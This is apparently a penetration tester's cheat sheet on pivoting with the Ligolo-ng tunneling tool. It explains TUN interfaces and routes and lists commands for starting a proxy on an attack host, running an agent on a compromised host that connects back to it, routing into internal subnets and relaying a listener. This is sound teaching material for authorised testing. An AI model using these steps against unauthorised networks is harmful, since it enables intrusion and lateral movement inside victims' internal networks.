Tunneling / Ligolo-NG

PRINCIPLE OF WORK

Tunneling works like a VPN between your machine and compromised hosts. You run a proxy on your machine and an agent on a pivot. When the agent connects back, your machine creates a virtual interface (tun0) — this is basically a fake network card that makes it look like you are inside the internal network.

To actually use it, you add routes. A route is just a rule like:

“if traffic is for 10.10.20.0/24 → send it through this agent”

So when you run something like:

nmap 10.10.20.15

your traffic goes into the virtual interface (tun0), the proxy checks its routes, sees that this subnet belongs to a specific agent, and sends the traffic through that agent to the target. The response comes back the same way.

With multiple pivots, agents connect through each other, but you still only control everything from your machine. You just add more routes, and the proxy already knows which agent is reachable through which path, so traffic automatically flows like:

Attacker → Pivot1 → Pivot2 → Target

You don’t manually chain anything — the interface makes it look local, and the routes decide where traffic goes.

LIGOLO-NG

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tunnel interface.

MANUAL (IP commands)

Creating and managing the TUN interface directly on your attack host without ligolo's built-in commands.

# Create TUN interface
sudo ip tuntap add user $(whoami) mode tun ligolo

# Bring it up
sudo ip link set ligolo up

# Add route to internal subnet through the interface
sudo ip r add 69.69.6.0/24 dev ligolo

# Delete when done
sudo ip tuntap del dev ligolo mode tun

LIGOLO CLI

Managing interface and routing from inside the ligolo-ng proxy console.

# Start proxy on attack host
./proxy -laddr 13.13.13.13:443 -selfcert

# Run agent on compromised host
./agent -connect 13.13.13.13:443 -ignore-cert

# Inside proxy console — create interface
ligolo-ng » ifcreate --name ligolo

# Select session
ligolo-ng » session
? Specify a session : 1 - {MACHINE} - 13.13.13.13:51234

# Add route to internal subnet
ligolo-ng » route_add --name ligolo --route 192.168.1.0/24

# Start session
[Agent] » start

# Start tunnel on specific interface
[Agent] » tunnel_start --tun ligolo

# Add listener for relay (listens on all connections to 1234 port and redirects it to attacker)
ligolo-ng » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:443

When you have multiple interfaces for the same subnet, only one route can be active at a time in your routing table. The other interface sits idle until you manually switch the route to it. So if you have setup which requires you to use different interfaces then you should make separate interfaces and use tunnel_start instead of just start